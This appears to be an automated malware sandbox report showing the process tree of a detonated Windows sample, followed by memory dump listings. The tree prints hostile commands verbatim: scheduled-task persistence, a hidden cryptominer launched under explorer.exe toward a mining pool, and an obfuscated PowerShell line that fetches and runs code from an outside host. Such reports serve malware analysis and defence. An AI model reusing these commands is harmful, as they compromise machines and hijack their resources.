                                                                              PID:4536
                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:2808
                                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1152
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                    4⤵
                                                                                      PID:4240
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                        5⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:5636
                                                                                    • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4264
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                        5⤵
                                                                                          PID:6488
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                            6⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:7112
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6544
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                          5⤵
                                                                                            PID:6484
                                                                                      • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4900
                                                                                        • C:\ProgramData\4432573.exe
                                                                                          "C:\ProgramData\4432573.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5672
                                                                                        • C:\ProgramData\6490685.exe
                                                                                          "C:\ProgramData\6490685.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:4472
                                                                                        • C:\ProgramData\2347656.exe
                                                                                          "C:\ProgramData\2347656.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:3736
                                                                                        • C:\ProgramData\8538837.exe
                                                                                          "C:\ProgramData\8538837.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5912
                                                                                      • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4932
                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4176
                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1936
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 808
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:4344
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 848
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:5904
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 884
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:5268
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 968
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:2756
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 944
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:5824
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 988
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:5276
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 1092
                                                                                          4⤵
                                                                                          • Program crash
                                                                                          PID:4872
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 1084
                                                                                          4⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          • Program crash
                                                                                          PID:5544
                                                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4848
                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2688
                                                                                      • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4612
                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4364
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-FEGPS.tmp\setup_2.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-FEGPS.tmp\setup_2.tmp" /SL5="$40278,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5312
                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5148
                                                                                        • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5364
                                                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5524
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5320
                                                                                      • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1904
                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:1688
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\tmp7402_tmp.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4884
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19de8ff4b6aefeb8.exe
                                                                                    Sun19de8ff4b6aefeb8.exe /mixone
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4508
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 656
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3772
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 672
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:5828
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 632
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:4624
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 640
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:5840
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 896
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:792
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 928
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:3064
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1176
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2284
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1140
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:4824
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1288
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:2956
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1280
                                                                                      2⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      • Program crash
                                                                                      PID:380
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1908b94df837b3158.exe
                                                                                    Sun1908b94df837b3158.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:4360
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun193fda712d9f1.exe
                                                                                    Sun193fda712d9f1.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4304
                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                    1⤵
                                                                                    • Process spawned unexpected child process
                                                                                    PID:4452
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                      2⤵
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3792
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-4MTGP.tmp\setup_2.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-4MTGP.tmp\setup_2.tmp" /SL5="$302A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                    1⤵
                                                                                      PID:6052
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-M01DU.tmp\postback.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-M01DU.tmp\postback.exe" ss1
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5164
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          explorer.exe ss1
                                                                                          3⤵
                                                                                            PID:5032
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                              4⤵
                                                                                                PID:6180
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                  5⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  PID:6496
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dll"
                                                                                                4⤵
                                                                                                  PID:6268
                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                    regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dll"
                                                                                                    5⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5212
                                                                                                    • C:\Windows\system32\regsvr32.exe
                                                                                                      /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dll"
                                                                                                      6⤵
                                                                                                        PID:4844
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dllxT7mKOJUO.dll"
                                                                                                    4⤵
                                                                                                      PID:2292
                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dllxT7mKOJUO.dll"
                                                                                                        5⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:7504
                                                                                                        • C:\Windows\system32\regsvr32.exe
                                                                                                          /s "C:\Users\Admin\AppData\Local\Temp\Sb1taEJRF.dllxT7mKOJUO.dll"
                                                                                                          6⤵
                                                                                                            PID:7872
                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5844
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1917b8fb5f09db8.exe
                                                                                                  Sun1917b8fb5f09db8.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4172
                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5676
                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5896
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                  1⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:5624
                                                                                                • C:\ProgramData\8538837.exe
                                                                                                  "C:\ProgramData\8538837.exe"
                                                                                                  1⤵
                                                                                                    PID:6120
                                                                                                  • C:\ProgramData\8538837.exe
                                                                                                    "C:\ProgramData\8538837.exe"
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:6056
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5912 -s 956
                                                                                                    1⤵
                                                                                                    • Program crash
                                                                                                    PID:5344
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                    1⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:2676
                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                    1⤵
                                                                                                    • Process spawned unexpected child process
                                                                                                    PID:1260
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:6164
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:5508
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                    1⤵
                                                                                                      PID:6096
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:7036
                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                      1⤵
                                                                                                      • Enumerates connected drives
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:7296
                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 6AFBDB8C7711312CB2810A7C022C88E2 C
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:7800
                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 760F427DC3083D616DE15591AA719286
                                                                                                        2⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Loads dropped DLL
                                                                                                        PID:1440
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                          3⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:6520
                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding F8F259E91FB883F92F0A5D098EEBBEA6 E Global\MSI0000
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:7632
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                      1⤵
                                                                                                      • Process spawned unexpected child process
                                                                                                      PID:7752
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:7776
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:7176
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:5512
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                        1⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4844
                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                        1⤵
                                                                                                          PID:7764
                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                            C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
                                                                                                            2⤵
                                                                                                            • Modifies system executable filetype association
                                                                                                            • Adds Run key to start application
                                                                                                            • Modifies Internet Explorer settings
                                                                                                            • Modifies registry class
                                                                                                            PID:5148
                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
                                                                                                              3⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              PID:956
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                          1⤵
                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                          PID:7280
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                          1⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:7804
                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          PID:4588
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:6892
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          PID:4892

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • memory/696-367-0x000001911CC40000-0x000001911CCB4000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1012-336-0x0000020BA7840000-0x0000020BA78B4000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1072-354-0x000001401BD10000-0x000001401BD84000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1152-252-0x0000000000160000-0x0000000000161000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1192-405-0x000001B004310000-0x000001B004384000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1296-403-0x000002D235470000-0x000002D2354E4000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1420-377-0x000001B0ECD60000-0x000001B0ECDD4000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1904-304-0x000001F43BDC0000-0x000001F43BDC1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1904-321-0x000001F43DC30000-0x000001F43DC32000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1904-363-0x000001F43DC35000-0x000001F43DC37000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1904-361-0x000001F43DC34000-0x000001F43DC35000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1904-358-0x000001F43DC32000-0x000001F43DC34000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1908-390-0x000001E018D10000-0x000001E018D84000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/1936-393-0x0000000000460000-0x00000000005AA000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.3MB

                                                                                                        • memory/1936-399-0x0000000000400000-0x0000000000458000-memory.dmp

                                                                                                          Filesize

                                                                                                          352KB

                                                                                                        • memory/2252-273-0x00000000010E0000-0x00000000010F5000-memory.dmp

                                                                                                          Filesize

                                                                                                          84KB

                                                                                                        • memory/2416-339-0x000001F348400000-0x000001F348474000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/2460-353-0x0000027780520000-0x0000027780594000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/2476-421-0x0000000005970000-0x0000000005971000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2476-330-0x0000000077AE0000-0x0000000077C6E000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.6MB

                                                                                                        • memory/2536-291-0x0000000004D80000-0x0000000004D81000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2536-323-0x0000000004F30000-0x000000000542E000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/2536-335-0x0000000005200000-0x0000000005203000-memory.dmp

                                                                                                          Filesize

                                                                                                          12KB

